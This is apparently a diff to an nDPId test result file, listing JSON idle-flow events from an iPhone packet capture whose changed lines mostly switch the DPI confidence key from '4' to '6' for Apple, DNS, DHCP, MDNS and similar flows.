+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454599225,"flow_last_seen":1582454600287,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454599740,"flow_last_seen":1582454600279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7913,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454553219,"flow_last_seen":1582454596366,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":2100,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454595839,"flow_last_seen":1582454599396,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454599396,"flow_last_seen":1582454600443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4485,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1955,"flow_avg_l4_payload_len":488,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454598888,"flow_last_seen":1582454599079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1582454598885,"flow_last_seen":1582454599226,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595352,"flow_last_seen":1582454596370,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454598385,"flow_last_seen":1582454599058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5314,"flow_avg_l4_payload_len":295,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454552576,"flow_last_seen":1582454582628,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454598766,"flow_last_seen":1582454598934,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5815,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":200000,"flow_min_l4_payload_len":362,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1881,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1582454599934,"flow_last_seen":1582454600426,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9568,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454599396,"flow_last_seen":1582454600443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4485,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1955,"flow_avg_l4_payload_len":488,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454598888,"flow_last_seen":1582454599079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1582454598885,"flow_last_seen":1582454599226,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595352,"flow_last_seen":1582454596370,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454598385,"flow_last_seen":1582454599058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5314,"flow_avg_l4_payload_len":295,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 